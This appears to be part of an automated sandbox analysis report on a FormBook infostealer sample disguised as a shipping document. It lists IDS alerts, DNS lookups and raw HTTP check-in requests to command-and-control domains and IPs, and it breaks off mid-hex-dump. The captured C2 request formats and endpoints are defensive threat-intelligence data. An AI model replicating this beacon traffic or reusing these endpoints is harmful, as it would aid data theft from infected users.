Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 67.223.117.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 67.223.117.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 47.129.103.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 38.47.237.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 113.20.119.31:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 113.20.119.31:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 38.47.237.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 206.119.81.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 38.47.237.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50054 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 206.119.81.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 47.129.103.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 142.250.184.211:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 206.119.81.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 206.119.81.36:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50062 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50060 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 142.250.184.211:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 142.250.184.211:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50061 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 142.250.184.211:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50058 -> 154.23.184.95:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.kghjkx.xyz
Source:	DNS query: www.iuyi542.xyz
Source:	DNS query: www.hasthosting.xyz

Source: Joe Sandbox View	IP Address: 38.88.82.56 38.88.82.56
Source: Joe Sandbox View	IP Address: 154.23.184.95 154.23.184.95

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49742

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FBCD62 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00FBCD62

Source: global traffic	HTTP traffic detected: GET /s7rc/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=6DRnIJ+Fte42OB/5XahWefuJxFukpBxOvMg5DpP/yyjJNxXWq01mXWJaUM52jX/tQu57he5PJxxVPcJX3Ib35ixrzLdezhzqPCe9qS9F0Axe4HxDKFQRrXU= HTTP/1.1Host: www.jllllbx.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fu91/?Ir8HUj=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.college-help.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /usv6/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk= HTTP/1.1Host: www.binacamasala.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xprp/?Ir8HUj=VtQLa3osnF7akoTJd8K7MWrEHzl8DW0FSH4Ha68GLubc/osER9eyiC9/VfKiy/o0cRDnmrVyyY747d0hGVpIr6r2fBWTDvY7eHgrrdp64c4dmhIDxYLLQeM=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.marketplacer.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /k47i/?Ir8HUj=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.energyparks.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9jdk/?Ir8HUj=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.yvrkp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /brrb/?Ir8HUj=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.flikka.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /i4bc/?Ir8HUj=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.ladylawher.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /c1ti/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs= HTTP/1.1Host: www.primeproperty.propertyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.kghjkx.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cymd/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= HTTP/1.1Host: www.iuyi542.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1i1f/?Ir8HUj=dQYajm//Sx1stwXHf3xlHA3S8l/u0vyC8xP2ywW2sRY4KNcSndLgw2rkEnULaIMwbbOqPpfkjMw6pD0cpqqLVjWWADBg9XXOC9f0UMcBOgWMQTbzF2Ef3i8=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.neg21.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m6se/?Ir8HUj=tpLSjTwEMN9ZKyp9qReDGLLjNHd3g2FWt49InxX861XvXeuMycl54O2gPUIwqUAFUHZpWTTH+IZzoIJ8zXVpnZ2Md6c4WxN9xCYnLA+vBCEiYAXHGzT4+go=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.digitaladpro.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /y0sc/?Ir8HUj=tJdq8Dqw4hWr1P6qEs9XA9ulKGeCKOZ69MCgVLcAx6ZVjDjmpjdFTuG7zOk3Xzu/3Z3aFvoU5EatdrO56B9xfE0dTwpHmj+n2Md29oHJdKs4Wl1g5NQAF3s=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.loginov.enterprisesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1bs4/?Ir8HUj=NHlL/20Wj3mxTDCCV+M5id+XoFfJt54Wk+fSFhy0eU4XSufIixCpuDbgh6jDD4pzJGK3HRNTU3Jm+E3fIwMaFSslRZAP0ZQrwEek3MA5lFQUr9BJzjrl1NA=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.wcp95.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /04fb/?Ir8HUj=EDSq5eKeQ/yn+NstHP+aoJNwtbWo2f2aV0X8lTwCWtszw4+D6CyS4FGQqOFHTxK4f9NdVPPEgKVRXB/uQSDXYOkNzy5V1DgJAKJcxyf5ssQ9BiSUznEU9hA=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1Host: www.hasthosting.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.jllllbx.top
Source: global traffic	DNS traffic detected: DNS query: www.college-help.info
Source: global traffic	DNS traffic detected: DNS query: www.binacamasala.com
Source: global traffic	DNS traffic detected: DNS query: www.marketplacer.top
Source: global traffic	DNS traffic detected: DNS query: www.energyparks.net
Source: global traffic	DNS traffic detected: DNS query: www.yvrkp.top
Source: global traffic	DNS traffic detected: DNS query: www.flikka.site
Source: global traffic	DNS traffic detected: DNS query: www.ladylawher.shop
Source: global traffic	DNS traffic detected: DNS query: www.primeproperty.property
Source: global traffic	DNS traffic detected: DNS query: www.kghjkx.xyz
Source: global traffic	DNS traffic detected: DNS query: www.iuyi542.xyz
Source: global traffic	DNS traffic detected: DNS query: www.neg21.top
Source: global traffic	DNS traffic detected: DNS query: www.digitaladpro.shop
Source: global traffic	DNS traffic detected: DNS query: www.loginov.enterprises
Source: global traffic	DNS traffic detected: DNS query: www.wcp95.top
Source: global traffic	DNS traffic detected: DNS query: www.hasthosting.xyz

Source: unknown

HTTP traffic detected: POST /fu91/ HTTP/1.1Host: www.college-help.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.college-help.infoContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 203Referer: http://www.college-help.info/fu91/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 49 72 38 48 55 6a 3d 4b 58 62 46 59 64 78 42 76 41 48 48 50 4d 6d 67 6f 55 43 4b 32 62 49 50 77 45 47 35 6f 70 6e 32 59 4f 63 56 42 69 49 39 67 35 38 55 56 4a 62 71 64 55 47 35 59 35 32 44 63 72 5a 42 30 54 6a 69 75 69 2f 4e 4c 59 2f 6c 73 5a 4b 68 58 7a 54 31 45 66 43 4c 4f 78 41 6c 68 74 74 51 30 79 76 47 45 72 4f 67 70 7a 33 66 54 44 6a 6b 57 77 4c 5a 4a 41 53 68 7a 48 77 37 4f 6d 73 56 65 44 53 74 4a 61 47 6e 47 6d 78 47 57 4b 2b 38 4d 30 6b 2b 4c 75 62 2f 7a 79 59 65 49 71 48 47 59 48 31 4d 75 33 32 45 49 30 53 59 33 4a 49 46 4e 39 54 4f 72 2f 6d 4b 2b 2b 36 6a 58 38 53 33 50 44 75 42 64 67 3d 3d Data Ascii: Ir8HUj=KXbFYdxBvAHHPMmgoUCK2bIPwEG5opn2YOcVBiI9g58UVJbqdUG5Y52DcrZB0Tjiui/NLY/lsZKhXzT1EfCLOxAlhttQ0yvGErOgpz3fTDjkWwLZJAShzHw7OmsVeDStJaGnGmxGWK+8M0k+Lub/zyYeIqHGYH1Mu32EI0SY3JIFN9TOr/mK++6jX8S3PDuBdg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:31:37 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:31:39 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 